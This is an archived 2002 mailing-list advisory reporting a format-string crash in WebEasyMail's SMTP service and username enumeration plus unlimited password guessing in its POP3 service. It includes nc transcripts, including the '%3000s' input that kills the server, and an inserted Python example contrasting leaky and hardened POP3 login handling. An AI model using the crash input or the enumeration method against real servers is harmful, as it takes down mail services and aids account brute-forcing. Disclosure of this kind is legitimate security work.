Advisory: DoS in WebEasyMail +more possible?

From: Stan Bubrouski (stanat_private)
Date: Mon Aug 19 2002 - 17:54:24 PDT


    Author: Stan Bubrouski
    Date: August 19, 2002
    Product: WebEasyMail
    Versions Affected: 3.4.2.2 (Latest) + previous
    Severity: Denial of Service on SMTP and POP3 portions
    of the software.  It has not been investigated but
    there might be a possibility of exploitation to
    execute code remotely.
    
    
    Problem #1:  The problem appears to lie in the SMTP
    portion of WebEasyMail.  When you send specially
    crafted format strings such as the printf family
    of functions use, it is possible to cause the
    service process to exit.  While no crash dialog
    appears, the service is terminated without an
    error message or such, and nothing appears in the
    logs.
    
    As an example:
    $ nc localhost 25
    220 ESMTP on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com
    %2
    502 Error: command not implemented
    %2s
    502 Error: command not implemented
    %100s
    502 Error: command not implemented
    %3000s
    [emsrv.exe silently dies here]
    $
    
    I have had no time to debug this problem so I do not
    know if it is exploitable.  The fact that it silently
    exits may be an indication of internal error handling,
    but it seems unlikely and I can't comment on it.
    
    
    Problem #2: WebEasyMail's POP3 server appears to be
    very weak in the prevent-brute-force attacks
    department.  First off it allows for the discovery
    of valid usernames by bugs in its output, for
    example:
    
    OK POP3 on WebEasyMail [3.4.2.2] ready.  http://www.winwebmail.com
    user dog
    +OK user accepted
    pass dog
    -ERR invalid username
    user test
    +OK user accepted
    pass dog
    -ERR wrong password for this user
    
    
    Notice that when a wrong password is given, the
    server responds with "-ERR invalid username" if
    the user does not exist, and "-ERR wrong password for this user"
    if the user does indeed exist.  Furthermore it
    seems to allow an unlimited number of guesses of
    usernames and passwords without disconnecting the
    remote connection.  This, coupled with the above,
    makes brute force attacks much easier.
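    The two weaknesses above, as an added example that is not WebEasyMail code: a minimal POP3 USER/PASS handler that can run either with the leaky behaviour the advisory shows (distinct error strings, no disconnect) or hardened (one generic error for both cases, connection dropped after a fixed number of failures). The account store, the MAX_FAILURES value and the reply strings are assumptions chosen for the example.

```python
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample account store (plaintext only to keep the example short).
ACCOUNTS = {"test": "s3cret"}
# Assumed policy: drop the connection after this many failed PASS attempts.
MAX_FAILURES = 3


@dataclass
class Session:
    hardened: bool
    user: Optional[str] = None
    failures: int = 0
    connected: bool = True


def handle(sess: Session, line: str) -> str:
    """Process one client line and return the server's reply ('' once closed)."""
    if not sess.connected:
        return ""
    verb, _, arg = line.strip().partition(" ")
    verb = verb.upper()
    if verb == "USER":
        sess.user = arg
        return "+OK user accepted"  # both variants accept any name at this stage
    if verb == "PASS":
        if sess.user is not None and ACCOUNTS.get(sess.user) == arg:
            sess.failures = 0
            return "+OK mailbox locked and ready"
        sess.failures += 1
        if not sess.hardened:
            # Leaky behaviour from the advisory: the reply reveals whether the
            # username exists, and the connection is never closed.
            if sess.user not in ACCOUNTS:
                return "-ERR invalid username"
            return "-ERR wrong password for this user"
        # Hardened: identical reply for unknown user and wrong password, USER
        # must be re-sent, and the session ends after MAX_FAILURES attempts.
        sess.user = None
        if sess.failures >= MAX_FAILURES:
            sess.connected = False
            return "-ERR authentication failed, closing connection"
        return "-ERR authentication failed"
    return "-ERR unknown command"


def run(lines: List[str], hardened: bool) -> List[str]:
    """Feed a scripted client exchange to a fresh session; return all replies."""
    sess = Session(hardened=hardened)
    return [handle(sess, line) for line in lines]
```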
    
    Vendor Status: I sent a message to the vendor of
    WebEasyMail (supportat_private) twice, first
    on August 2, 2002 and August 8, 2002 but received
    no response.  As a result of the lack of response
    or even acknowledgement my messages were received
    this advisory has been released.
    



    This archive was generated by hypermail 2b30 : Tue Aug 20 2002 - 08:06:08 PDT